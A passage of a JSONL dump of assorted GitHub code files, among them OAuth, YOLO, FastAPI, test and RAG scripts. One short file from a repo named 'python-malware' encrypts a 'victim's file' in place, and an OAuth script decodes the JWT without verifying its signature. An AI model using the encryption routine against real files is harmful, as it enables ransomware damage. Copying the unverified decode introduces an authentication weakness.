150;\n filtered_based_on_percentile = unique_wikidata_ids.filter(col(\"count\")>=threshold)\n # filtered_based_on_percentile = unique_wikidata_ids.groupb(\"percent_rank\", functions.percent_rank())\n filtered_based_on_percentile = filtered_based_on_percentile.sort(col(\"count\").desc());\n filtered_based_on_percentile = filtered_based_on_percentile.withColumnRenamed('wikidata_id','filtered_id')\n # print_shape(filtered_based_on_percentile)\n # filtered_based_on_percentile.show()\n \n join_data = amenities.join(filtered_based_on_percentile, amenities.wikidata_id == filtered_based_on_percentile.filtered_id).select('lat', 'lon', 'amenity', 'name', 'count', 'wikidata_id')\n print(\"vancouver_interesting_things:\")\n print_shape(join_data)\n join_data.show()\n \n # name = amenities.groupBy('name').count()\n # print_shape(name)\n # name.show()\n \n # print_shape(amenities)\n # amenities.show()\n \n # unique_wikidata_ids = unique_wikidata_ids.na.drop()\n # # unique_wikidata_ids = unique_wikidata_ids.drop('count')\n # unique_wikidata_ids = unique_wikidata_ids.withColumnRenamed('count', 'wikidata_occurrences')\n \n # # Get list of unique amenity names\n # amenities_only = amenities.select(amenities.columns[3])\n # print(\"amenities_only:\")\n # print_shape(amenities_only)\n # amenities_only.show()\n\n # unique_amenities = amenities_only.dropDuplicates()\n # print(\"unique_amenities:\")\n # print_shape(unique_amenities)\n # unique_amenities.show()\n\n # This list of values is in the 100s so safe to coalesce\n join_data.toPandas().to_csv(\"vancouver-interesting-things.csv\")\n\nif __name__=='__main__':\n in_directory = sys.argv[1]\n main(in_directory)","repo_name":"rcmcg/CMPT353-Data-Science","sub_path":"get_interesting_things.py","file_name":"get_interesting_things.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38494300121","text":"from typing import Dict, List\n\nclass Request:\n def __init__(self):\n self.address: str = \"\"\n self.method: str = \"\"\n self.headers: Dict[str, str] = {}\n self.body: str = \"\"\n\n def load_header(self, raw: str) -> None:\n req = raw.split(\"\\r\\n\")\n spl = req[0].split(\" \")\n self.method = spl[0]\n self.address = spl[1]\n\n headers = [n for n in req[1:] if n != '']\n for h in headers:\n hr = h.split(\":\", 1)\n self.headers[hr[0].lower()] = hr[1]\n\n def load_body(self, raw: str) -> None:\n self.body = raw.split(\"=\")[1] if raw else \"\"\n\n @property\n def headers_list(self) -> List[str]:\n ret: List[str] = []\n for i in self.headers:\n ret += [f\"{i}: {self.headers[i]}\"]\n return ret\n","repo_name":"anggar/progjar","sub_path":"tugas8/req.py","file_name":"req.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39149484409","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\r\nfrom urllib.parse import urlparse, parse_qs, quote_plus\r\nimport webbrowser\r\nimport requests\r\nimport sys\r\nimport json\r\nimport jwt\r\nimport secrets\r\nimport base64\r\nimport hashlib\r\n\r\n# Begin Configuration\r\nclient_id =\"PUT YOUR CLIENT ID HERE\"\r\nclient_secret= \"PUT YOUR CLIENT SECRET HERE\"\r\nauth_uri = \"https://accounts.google.com/o/oauth2/v2/auth\"\r\ntoken_uri = \"https://oauth2.googleapis.com/token\"\r\nredirect_uri = \"http://localhost:8000\"\r\n# End Configuration\r\n\r\nclass AccessCodeHandler(BaseHTTPRequestHandler):\r\n def do_GET(self):\r\n global access_code\r\n query = parse_qs(urlparse (self.path).query)\r\n code = query.get('code', None)\r\n if code != None:\r\n access_code = code[0]\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n self.wfile.write(bytes(\"Python3 OAuth by controlthings.gr\", \"utf-8\"))\r\n self.wfile.write(bytes(\"\", \"utf-8\"))\r\n self.wfile.write(bytes(\"

    You can now close the browser and return to the application.

    \", \"utf-8\"))\r\n self.wfile.write(bytes(\"\", \"utf-8\"))\r\n\r\naccess_code = \"\"\r\ncode_verifier = secrets.token_urlsafe(64) #PKCE code verifier, must be > 32 bytes for google, it must also be < 128 characters\r\ncode_challenge = base64.urlsafe_b64encode(hashlib.sha256(code_verifier.encode()).digest()).decode().rstrip(\"=\")\r\nredirect_uri_urlencoded = quote_plus(redirect_uri )\r\n_authorization_url = f\"\"\"{auth_uri}?\r\nresponse_type=code&\r\nclient_id={client_id}&\r\nscope=openid%20email&\r\nredirect_uri={redirect_uri_urlencoded}&\r\ncode_challenge={code_challenge}&\r\ncode_challenge_method=S256\r\n\"\"\".replace(\"\\n\", \"\")\r\n\r\nprint(\"...Opening browser\")\r\nwebbrowser.open(_authorization_url)\r\nprint(\"...Running server to receive access code\")\r\nhttpd = HTTPServer(('127.0.0.1', 8000), AccessCodeHandler)\r\nhttpd.handle_request()\r\nprint(access_code)\r\nif (access_code == \"\"):\r\n print(\"Code was not received. Inspect errors in the output\")\r\n sys.exit()\r\n\r\nprint(\"...Requesting token\")\r\n_token_post_data = {\r\n 'code': access_code,\r\n 'client_id': client_id,\r\n 'client_secret':client_secret,\r\n 'redirect_uri':redirect_uri,\r\n 'grant_type':'authorization_code',\r\n 'code_verifier':code_verifier\r\n}\r\n\r\ntoken_response = requests.post(token_uri, data=_token_post_data)\r\n#assuming correct response\r\ntoken_response_json = json.loads(token_response.text)\r\nid_token = id_token = jwt.decode(token_response_json['id_token'], options={\"verify_signature\": False}) # It came directly from google, no need to verify signature https://developers.google.com/identity/openid-connect/openid-connect#obtainuserinfo\r\nprint(id_token)\r\n\r\n","repo_name":"controlthingsopensource/google-openidc","sub_path":"google-openidc.py","file_name":"google-openidc.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7549777337","text":"import os\nimport pickle\nimport unittest\n\nfrom bokeh.io import output_file, show\nfrom bokeh.layouts import layout\nfrom bokeh.models import Div, Plot, Scatter, Label\nfrom bokeh.plotting import save, figure\n\nimport gt7dashboard.gt7diagrams\nimport gt7dashboard.gt7helper\nfrom gt7dashboard import gt7diagrams, gt7helper\nfrom gt7dashboard.gt7diagrams import (\n get_throttle_braking_race_line_diagram,\n)\nfrom gt7dashboard.gt7lap import Lap\n\n\nclass TestHelper(unittest.TestCase):\n def setUp(self) -> None:\n self.path = os.path.join(\n os.getcwd(), \"test_data\", \"brands_hatch_10_laps.laps\"\n )\n with open(self.path, \"rb\") as f:\n self.test_laps = pickle.load(f)\n\n def test_get_throttle_braking_race_line_diagram(self):\n (\n race_line,\n throttle_line_data,\n breaking_line_data,\n coasting_line_data,\n reference_throttle_line_data,\n reference_breaking_line_data,\n reference_coasting_line_data,\n ) = get_throttle_braking_race_line_diagram()\n\n reference_lap = self.test_laps[0]\n last_lap = self.test_laps[1]\n\n lap_data = last_lap.get_data_dict()\n reference_lap_data = reference_lap.get_data_dict()\n\n throttle_line_data.data_source.data = lap_data\n breaking_line_data.data_source.data = lap_data\n coasting_line_data.data_source.data = lap_data\n\n reference_throttle_line_data.data_source.data = reference_lap_data\n reference_breaking_line_data.data_source.data = reference_lap_data\n reference_coasting_line_data.data_source.data = reference_lap_data\n\n gt7diagrams.add_annotations_to_race_line(race_line, last_lap, reference_lap)\n\n out_file = \"test_out/test_get_throttle_braking_race_line_diagram.html\"\n output_file(out_file)\n save(race_line)\n print(\"View file for reference at %s\" % out_file)\n\n # get file size, should be about 3.5MB\n file_size = os.path.getsize(out_file)\n self.assertAlmostEqual(file_size, 4500000, delta=1000000)\n\n def helper_get_race_diagram(self):\n rd = gt7diagrams.RaceDiagram(600)\n\n lap_data_1 = self.test_laps[0].get_data_dict()\n lap_data_2 = self.test_laps[1].get_data_dict()\n\n median_lap_data = gt7helper.get_median_lap(self.test_laps).get_data_dict()\n\n rd.source_time_diff.data = gt7helper.calculate_time_diff_by_distance(\n self.test_laps[0], self.test_laps[1]\n )\n rd.source_last_lap.data = lap_data_2\n rd.source_reference_lap.data = lap_data_1\n rd.source_median_lap.data = median_lap_data\n\n return rd\n\n def test_race_diagram(self):\n\n rd = self.helper_get_race_diagram()\n\n out_file = \"test_out/test_race_diagram.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(rd.get_layout())\n\n # get file size, should be about 5MB\n file_size = os.path.getsize(out_file)\n self.assertAlmostEqual(file_size, 2500000, delta=1000000)\n\n def test_add_5_additional_laps_to_race_diagram(self):\n\n rd = self.helper_get_race_diagram()\n\n # Add a random new lap to the mix\n # TODO Unfortunately, we have only 2 to pick from. Maybe improve this later\n gray_lap_source = rd.add_additional_lap_to_race_diagram(\"gray\", self.test_laps[1], True)\n\n # Should now contain 1 source\n self.assertEqual(1, len(rd.sources_additional_laps))\n\n out_file = \"test_out/test_add_5_additional_laps_to_race_diagram_with_additional_lap.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(rd.get_layout())\n\n rd.delete_all_additional_laps()\n self.assertEqual(0, len(rd.sources_additional_laps))\n\n out_file = \"test_out/test_add_5_additional_laps_to_race_diagram_without_additional_lap.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(rd.get_layout())\n\n # get file size, should be about 5MB\n file_size = os.path.getsize(out_file)\n self.assertAlmostEqual(file_size, 2600000, delta=1000000)\n\n with open(out_file, 'r') as fp:\n data = fp.read()\n self.assertNotIn(\"1:28.465\", data)\n\n\n def test_get_fuel_map_html_table(self):\n d = Div()\n lap = Lap()\n lap.fuel_at_start = 100\n lap.fuel_at_end = 80\n lap.lap_finish_time = 90 * 1000\n\n fuel_map_html_table = gt7diagrams.get_fuel_map_html_table(lap)\n d.text = fuel_map_html_table\n out_file = \"test_out/test_get_fuel_map_html_table.html\"\n output_file(out_file)\n save(d)\n print(\"View file for reference at %s\" % out_file)\n\n def test_get_fuel_map_html_table_negative_fuel_consumption(self):\n d = Div()\n lap = Lap()\n lap.fuel_at_start = 0\n lap.fuel_at_end = 100\n lap.lap_finish_time = 90 * 1000\n\n fuel_map_html_table = gt7diagrams.get_fuel_map_html_table(lap)\n d.text = fuel_map_html_table\n out_file = \"test_out/test_get_fuel_map_html_table_negative_fuel_consumption.html\"\n output_file(out_file)\n save(d)\n print(\"View file for reference at %s\" % out_file)\n\n with open(out_file, 'r') as fp:\n data = fp.read()\n self.assertIn(\"No Fuel\", data)\n\n def test_get_fuel_map_html_table_with_no_consumption(self):\n d = Div()\n fuel_map_html_table = gt7diagrams.get_fuel_map_html_table(self.test_laps[0])\n d.text = fuel_map_html_table\n out_file = \"test_out/test_get_fuel_map_html_table_with_no_consumption.html\"\n output_file(out_file)\n save(d)\n print(\"View file for reference at %s\" % out_file)\n\n\n def test_race_table(self):\n rt = gt7diagrams.RaceTimeTable()\n rt.show_laps(self.test_laps)\n\n out_file = \"test_out/test_race_table.html\"\n output_file(out_file)\n save(rt.t_lap_times)\n\n def test_display_variance(self):\n rd = self.helper_get_race_diagram()\n rd.update_fastest_laps_variance(self.test_laps)\n\n out_file = \"test_out/test_get_last_variance.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(rd.get_layout())\n\n # get file size, should be about 5MB\n file_size = os.path.getsize(out_file)\n self.assertAlmostEqual(file_size, 3000000, delta=1000000)\n\n def test_display_flat_line_variance(self):\n rd = self.helper_get_race_diagram()\n # three times the same lap should result in a flat line\n rd.update_fastest_laps_variance([self.test_laps[0], self.test_laps[0], self.test_laps[0]])\n\n out_file = \"test_out/test_display_flat_line_variance.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(layout(rd.f_speed_variance))\n\n # get file size, should be about 5MB\n file_size = os.path.getsize(out_file)\n self.assertAlmostEqual(file_size, 140000, delta=1000000)\n\n def test_get_speed_peak_and_valley_diagram_different_size(self):\n last_lap = self.test_laps[0]\n reference_lap = self.test_laps[5]\n div = Div()\n div.text = gt7diagrams.get_speed_peak_and_valley_diagram(last_lap, reference_lap)\n\n out_file = \"test_out/test_get_speed_peak_and_valley_diagram_different_size.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(layout(div))\n\n def test_get_speed_peak_and_valley_diagram_same_size(self):\n last_lap = self.test_laps[2]\n reference_lap = self.test_laps[3]\n div = Div()\n div.text = gt7diagrams.get_speed_peak_and_valley_diagram(last_lap, reference_lap)\n\n out_file = \"test_out/test_get_speed_peak_and_valley_diagram_same_size.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(layout(div))\n","repo_name":"snipem/gt7dashboard","sub_path":"gt7dashboard/test/test_gt7diagrams.py","file_name":"test_gt7diagrams.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"72"} +{"seq_id":"28345040404","text":"import wx\nimport cv2\nimport numpy as np\nimport time\nfrom pynput.mouse import Button,Controller\n\n\n\ncam=cv2.VideoCapture(0)\n#yellow\nlower=np.array([20,100,100])\nupper=np.array([30,255,255])\n#blue\n#lower=np.array([110,50,50])\n#upper=np.array([130,255,255])\nkernalOpen=np.ones((5,5))\nkernalClose=np.ones((20,20))\n\n\nmouse=Controller()\napp=wx.App(False)\n(sx,sy)=wx.GetDisplaySize()\n(camx,camy)=(480,320)\n\nhold=False\nfirstClick=False\nstart=0\nend=-10\n\nwhile True:\n ret,img=cam.read()\n img=cv2.resize(img,(camx,camy))\n img_hsv=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n mask=cv2.inRange(img_hsv,lower,upper)\n maskOpen=cv2.morphologyEx(mask,cv2.MORPH_OPEN,kernalOpen)\n maskClose=cv2.morphologyEx(maskOpen,cv2.MORPH_CLOSE,kernalClose)\n maskFinal=maskClose\n #cv2.imshow('hsv',img_hsv)\n conts,h=cv2.findContours(maskFinal.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n sconts=[c for c in conts if cv2.contourArea(c)>=500]\n n=len(sconts)\n if n==2:\n # for move mouse pointer\n firstClick=True\n x1,y1,w1,h1=cv2.boundingRect(sconts[0])\n x2,y2,w2,h2=cv2.boundingRect(sconts[1])\n # drawing rectangle over the objects\n cv2.rectangle(img,(x1,y1),(x1+w1,y1+h1),(255,0,0),5)\n cv2.rectangle(img,(x2,y2),(x2+w2,y2+h2),(255,0,0),5)\n #centre coordinate of first object\n cx1=x1+w1//2\n cy1=y1+h1//2\n\n cx2=x2+w2//2\n cy2=y2+h2//2\n\n #drawing line\n cv2.line(img,(cx1,cy1),(cx2,cy2),(0,255,0),3)\n\n cx=(cx1+cx2)//2\n cy=(cy1+cy2)//2\n #cx,cy=cx1,cy1\n\n\n # Drawing the point (red dot) \n cv2.circle(img, (cx,cy),2,(0,0,255),2)\n #adding the pointer\n \n\n (mold0,mold1)=(sx-(cx*sx/camx), cy*sy/camy)\n #mloc0=(cx-mold0)*0.5\n #mloc1=(cy-mold1)*0.5\n #mloc0,mloc1=mold0*0.8,mold1*0.8\n #mouse.release(Button.left)\n #mouse.release(Button.left)\n\n\n\n if hold:\n hold=False\n mouse.release(Button.left)\n end=time.time()\n print(\"end - start =\",end-start)\n if 0.08<=end-start<=2:\n\n mouse.press(Button.left)\n mouse.release(Button.left)\n mouse.press(Button.left)\n mouse.release(Button.left)\n\n mouse.position=(mold0*0.8,mold1*0.8)\n\n \n \n elif n==1 and firstClick:\n\n x1, y1, w1, h1 = cv2.boundingRect(sconts[0])\n cv2.rectangle(img, (x1, y1), (x1 + w1, y1 + h1), (255, 0, 0), 5)\n (cx,cy)=(x1+w1//2,y1+h1//2)\n if not hold:\n #mouse.press(Button.left)\n #mouse.release(Button.left)\n mouse.press(Button.left)\n start=time.time()\n hold=True\n #mouse.release(Button.left)\n #mouse.press(Button.left)\n (posx,posy)=(sx-(cx*sx/camx), cy*sy/camy)\n mouse.position=(posx*0.8,posy*0.8)\n #mouse.release(Button.left)\n\n\n\n\n cv2.imshow('from cam',img)\n \n key=cv2.waitKey(5)\n if key==ord('q'):\n cv2.destroyAllWindows()\n break\ncam.release()\n","repo_name":"sdmars/pypro","sub_path":"gesture_controlled_mouse_final.py","file_name":"gesture_controlled_mouse_final.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33893283590","text":"from app.auth import check_is_admin, get_user\nfrom app.controllers.users import UserController\nfrom app.database import get_session\nfrom app.schemas.users import User, UserCreate, UserUpdate\nfrom fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\nfrom typing import List\nfrom uuid import UUID\n\n\nrouter = APIRouter()\n\n\n@router.get('/', response_model=List[User])\nasync def get_users(\n user: User = Depends(get_user),\n db: Session = Depends(get_session)\n) -> List[User]:\n \"\"\"\n Get users list\n \"\"\"\n return UserController.get_users(db)\n\n\n@router.get('/{user_id}', response_model=User)\nasync def get_user(\n user_id: UUID,\n db: Session = Depends(get_session)\n) -> User:\n \"\"\"\n Get user\n \"\"\"\n return UserController.get_user(db, user_id)\n\n\n@router.delete('/{user_id}')\nasync def delete_user(\n user_id: UUID,\n user: User = Depends(get_user),\n db: Session = Depends(get_session)\n) -> None:\n \"\"\"\n Delete user\n \"\"\"\n check_is_admin(user)\n return UserController.delete_user(db, user_id)\n","repo_name":"rclsilver/face-recognition","sub_path":"server/app/routers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23775249491","text":"'''\n1302. Deepest Leaves Sum\nMedium\n\n2900\n\n81\n\nAdd to List\n\nShare\nGiven the root of a binary tree, return the sum of values of its deepest leaves.\n \n\nExample 1:\n\n\nInput: root = [1,2,3,4,5,null,6,7,null,null,null,null,8]\nOutput: 15\nExample 2:\n\nInput: root = [6,7,8,2,7,1,3,9,null,1,4,null,null,null,5]\nOutput: 19\n \n\nConstraints:\n\nThe number of nodes in the tree is in the range [1, 104].\n1 <= Node.val <= 100\nAccepted\n194,802\nSubmissions\n224,849\n'''\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n#bfs\nclass Solution:\n def deepestLeavesSum(self, root: Optional[TreeNode]) -> int:\n q = [root]\n while q:\n s = sum(n.val for n in q)\n q = [c for n in q for c in [n.left, n.right] if c]\n return s\n\n#bfs\nclass Solution:\n def deepestLeavesSum(self, root: Optional[TreeNode]) -> int:\n q = [root]\n while q:\n pre, q = q, [c for n in q for c in [n.left, n.right] if c]\n return sum(n.val for n in pre)\n\n#dfs\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def deepestLeavesSum(self, root: Optional[TreeNode]) -> int:\n self.s = 0\n self.max_level = 0\n \n def dfs(node, level):\n if not node: return\n \n if level == self.max_level:\n self.s += node.val\n elif level > self.max_level:\n self.s = node.val\n self.max_level = level\n \n dfs(node.left, level+1)\n dfs(node.right, level+1)\n \n dfs(root, 0)\n return self.s","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2022/05. May/15.deepestLeavesSum.py","file_name":"15.deepestLeavesSum.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39185740229","text":"# import the necessary packages\nimport numpy as np\nimport cv2\n\n# define file path\nyolo_path = \"yolo-coco/\"\nimage_path = \"images/\"\n\n\n# load the COCO class labels\nlabels_path = yolo_path + \"coco.names\"\nlabels = open(labels_path).read().strip().split(\"\\n\")\n\n\nweights_path = yolo_path + \"yolov3.weights\"\nconfig_path = yolo_path + \"yolov3.cfg\"\nnet = cv2.dnn.readNetFromDarknet(config_path, weights_path)\nln = net.getLayerNames()\nln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n\nimage = cv2.imread(\"images/football.jpg\")\n(H, W) = image.shape[:2]\n\n\nblob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416), swapRB=True, crop=False)\nnet.setInput(blob)\nlayerOutputs = net.forward(ln)\n\n\nboxes = []\nconfidences = []\nclassIDs = []\n\n\nfor output in layerOutputs:\n\tfor detection in output:\n\t\tscores = detection[5:]\n\t\tclassID = np.argmax(scores)\n\t\tconfidence = scores[classID] \n\t\tif confidence > 0.50:\n\t\t\tbox = detection[0:4] * np.array([W, H, W, H])\n\t\t\t(centerX, centerY, width, height) = box.astype(\"int\")\n\t\t\tx = int(centerX - (width / 2))\n\t\t\ty = int(centerY - (height / 2))\n\t\t\tboxes.append([x, y, int(width), int(height)])\n\t\t\tconfidences.append(float(confidence))\n\t\t\tclassIDs.append(classID)\n \n\nidxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.3)\nif len(idxs) > 0:\n\tfor i in idxs.flatten():\n\t\t(x, y) = (boxes[i][0], boxes[i][1])\n\t\t(w, h) = (boxes[i][2], boxes[i][3])\n\n\t\tcv2.rectangle(image, (x, y), (x + w, y + h), (0,255,255), 2)\n\t\ttext = \"{}: {:.2f}\".format(labels[classIDs[i]], confidences[i])\n\t\tcv2.putText(image, text, (x, y - 7), cv2.FONT_HERSHEY_SIMPLEX, \n 0.5, (0,255,255), 2)\n\ncv2.imshow(\"Output\", image)\n","repo_name":"Furkan-Gulsen/Object-Detection-with-YOLO","sub_path":"yolo_for_image.py","file_name":"yolo_for_image.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"23923043379","text":"import os\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\nimport datetime\n\nfrom python.data import *\n\n\nclass GetGamesForTourney(webapp.RequestHandler):\n\tdef post(self):\n\t\ttk = db.Key(self.request.get('tournamentKey'))\n\t\ttournament = db.get(tk)\n\t\t\n\t\ttemplate_values = {\n\t\t\t\t\t\t\t\"tournament\":tournament\n\t\t\t\t\t\t\t}\n\t\tpath = os.path.join(os.path.dirname(__file__), '../xml/lists/game.xml')\n\t\tself.response.out.write(template.render(path, template_values))\n\t\t\n\t\t\nclass GetTeamsForTourney(webapp.RequestHandler):\n\tdef post(self):\n\t\ttk = db.Key(self.request.get('tournamentKey'))\n\t\tdk = db.Key(self.request.get('divisionKey'))\n\t\tck = db.Key(self.request.get('countryKey'))\n\t\tteams = db.GqlQuery(\"SELECT * FROM Team WHERE tournament = :1 AND division = :2 AND country = :3\", tk, dk, ck)\n\t\ttemplate_values = {\n\t\t\t\t\t\t\t\"teams\":teams\n\t\t\t\t\t\t\t}\n\t\tpath = os.path.join(os.path.dirname(__file__), '../xml/lists/team.xml')\n\t\tself.response.out.write(template.render(path, template_values))\n\nclass NewGame(webapp.RequestHandler):\n\tdef post(self):\n\t\tgame = Game()\n\t\tgame.tournament = db.Key(self.request.get('tournamentKey'))\n\t\tdateString = self.request.get('gameDate')\n\t\tgame.startDate = datetime.datetime.strptime(dateString, '%d-%m-%Y').date()\n\t\tgame.division = db.Key(self.request.get('gameDivision'))\n\t\tgame.gameType = db.Key(self.request.get('gameType'))\n\t\tif self.request.get('testMatch') == 'true':\n\t\t\tgame.testMatch = True\n\t\telse:\n\t\t\tgame.testMatch = False\n\t\tgame.put()\n\t\t\n\t\t#Process Black Team\n\t\tbCountry = db.Key(self.request.get('bCountry'))\n\t\tbDivision = db.Key(self.request.get('bDivision'))\n\t\tbTeams = db.GqlQuery(\"SELECT * FROM Team WHERE tournament = :1 AND division = :2 AND country = :3\", game.tournament, bDivision, bCountry)\n\t\tif bTeams.count() > 1:\n\t\t\t#ask which team\n\t\t\tself.response.out.write('More than one black team')\n\t\telif bTeams.count() > 0:\n\t\t\t#one team\n\t\t\tbgt = GameTeam()\n\t\t\tbgt.team = bTeams.get()\n\t\t\tbgt.score = int(self.request.get('bscore'))\n\t\t\tbgt.colour = 'black'\n\t\t\tbgt.game = game\n\t\t\tbgt.put()\n\n\t\telse:\n\t\t\t#no team\n\t\t\tbt = Team()\n\t\t\tbt.country = bCountry\n\t\t\tbt.tournament = game.tournament\n\t\t\tbt.division = bDivision\n\t\t\tbt.put()\n\t\t\t\n\t\t\tbgt = GameTeam()\n\t\t\tbgt.team = bTeams.get()\n\t\t\tbgt.score = int(self.request.get('bscore'))\n\t\t\tbgt.colour = 'black'\n\t\t\tbgt.game = game\n\t\t\tbgt.put()\n\n\t\t\n\t\t#Process White Team\n\t\twCountry = db.Key(self.request.get('wCountry'))\n\t\twDivision = db.Key(self.request.get('wDivision'))\n\t\twTeams = db.GqlQuery(\"SELECT * FROM Team WHERE tournament = :1 AND division = :2 AND country = :3\", game.tournament, wDivision, wCountry)\n\t\tif wTeams.count() > 1:\n\t\t\tself.response.out.write('More than one white team')\n\t\telif wTeams.count() > 0:\n\t\t\t#one team\n\t\t\twgt = GameTeam()\n\t\t\twgt.team = wTeams.get()\n\t\t\twgt.score = int(self.request.get('wscore'))\n\t\t\twgt.colour = 'white'\n\t\t\twgt.game = game\n\t\t\twgt.put()\n\t\telse:\n\t\t\t#no team\n\t\t\twt = Team()\n\t\t\twt.country = wCountry\n\t\t\twt.tournament = game.tournament\n\t\t\twt.division = wDivision\n\t\t\twt.put()\n\t\t\t\n\t\t\twgt = GameTeam()\n\t\t\twgt.team = wTeams.get()\n\t\t\twgt.score = int(self.request.get('wscore'))\n\t\t\twgt.colour = 'white'\n\t\t\twgt.game = game\n\t\t\twgt.put()\n\t\t\n\t\tself.response.out.write('Made it to here')\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bentilly/UWH-Heroes","sub_path":"uwhheroes.appspot/python/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4277284918","text":"from src.helper.hashing import *\r\n\r\ndef encrypt(file_path: str):\r\n \"\"\"\r\n Use this to encrypt the victim's file.\r\n \"\"\"\r\n key = load_key()\r\n f = Fernet(key)\r\n myFileText = \"\"\r\n with open(file_path, \"rb\") as file:\r\n myFileText = file.read()\r\n \r\n with open(file_path, \"wb\") as file:\r\n file.write(f.encrypt(myFileText))\r\n","repo_name":"YasharHTML/python-malware","sub_path":"src/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74150781992","text":"import time\nimport os\nimport pandas as pd\nimport numpy as np\nimport openai\nimport torch\nfrom torch.nn import functional as F\nfrom sentence_transformers import SentenceTransformer\n\nfrom dotenv import load_dotenv, find_dotenv\n_ = load_dotenv(find_dotenv())\nfrom huggingface_hub import login\nfrom milvus import default_server\nfrom pymilvus import (\n connections, utility\n)\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.vectorstores import Milvus\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.document_loaders import PyPDFLoader\nfrom transformers import AutoModelForQuestionAnswering, AutoTokenizer, pipeline\n\ndefault_server.stop()\ndefault_server.cleanup()\n\nstart_time = time.time()\ndefault_server.start() \nend_time = time.time()\nprint(f\"Milvus server startup time: {end_time - start_time} sec\")\n\ntime.sleep(15) \nconnections.connect(host='127.0.0.1', \n port=default_server.listen_port,\n show_startup_banner=True)\nprint(utility.get_server_version()) \n\ntorch.backends.cudnn.deterministic = True\nRANDOM_SEED = 413\ntorch.manual_seed(RANDOM_SEED)\nDEVICE = torch.device('cuda:3' if torch.cuda.is_available() else 'cpu')\nprint(f\"device: {DEVICE}\")\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\nhub_token = os.getenv(\"HUGGINGFACEHUB_API_TOKEN\")\nlogin(token=hub_token)\nmodel_name = \"BAAI/bge-base-en-v1.5\"\nretriever = SentenceTransformer(model_name, device=DEVICE)\nprint(type(retriever))\nprint(retriever)\n\nMAX_SEQ_LENGTH = retriever.get_max_seq_length() \nHF_EOS_TOKEN_LENGTH = 1\nEMBEDDING_LENGTH = retriever.get_sentence_embedding_dimension()\nprint(f\"model_name: {model_name}\")\nprint(f\"EMBEDDING_LENGTH: {EMBEDDING_LENGTH}\")\nprint(f\"MAX_SEQ_LENGTH: {MAX_SEQ_LENGTH}\")\n\nmodel_kwargs = {\"device\": DEVICE}\nencode_kwargs = {'normalize_embeddings': True}\nlc_encoder = HuggingFaceEmbeddings(\n model_name=model_name,\n model_kwargs=model_kwargs,\n encode_kwargs=encode_kwargs\n)\ntype(lc_encoder)\n\nfile_path1 = \"/Users/gracesodunke/Documents/Google STEP/LONDON Grace Ayomide Sodunke_Offer Letter_463737234_1688056780235.pdf\"\nfile_path2 = \"/Users/gracesodunke/Documents/Google STEP/Grace Ayomide Sodunke_Offer Letter_463737234_1683043578334_20230509-1541.pdf\" \n\nMILVUS_PORT = 19530\nMILVUS_HOST = \"127.0.0.1\"\n\nvector_store = Milvus(\n collection_name=\"Collection3\",\n embedding_function=lc_encoder,\n connection_args={\"host\": MILVUS_HOST, \"port\": MILVUS_PORT},\n)\n\ndef upload_document(pdf_path: str):\n loader = PyPDFLoader(pdf_path)\n pages = loader.load()\n chunk_size = MAX_SEQ_LENGTH - HF_EOS_TOKEN_LENGTH\n chunk_overlap = np.round(chunk_size * 0.10, 0)\n start_time = time.time()\n text_splitter = RecursiveCharacterTextSplitter(\n chunk_size = chunk_size,\n chunk_overlap = chunk_overlap,\n length_function = len,\n )\n chunks = text_splitter.create_documents(\n [p.page_content for p in pages], \n metadatas=[{\"name\": pdf_path} 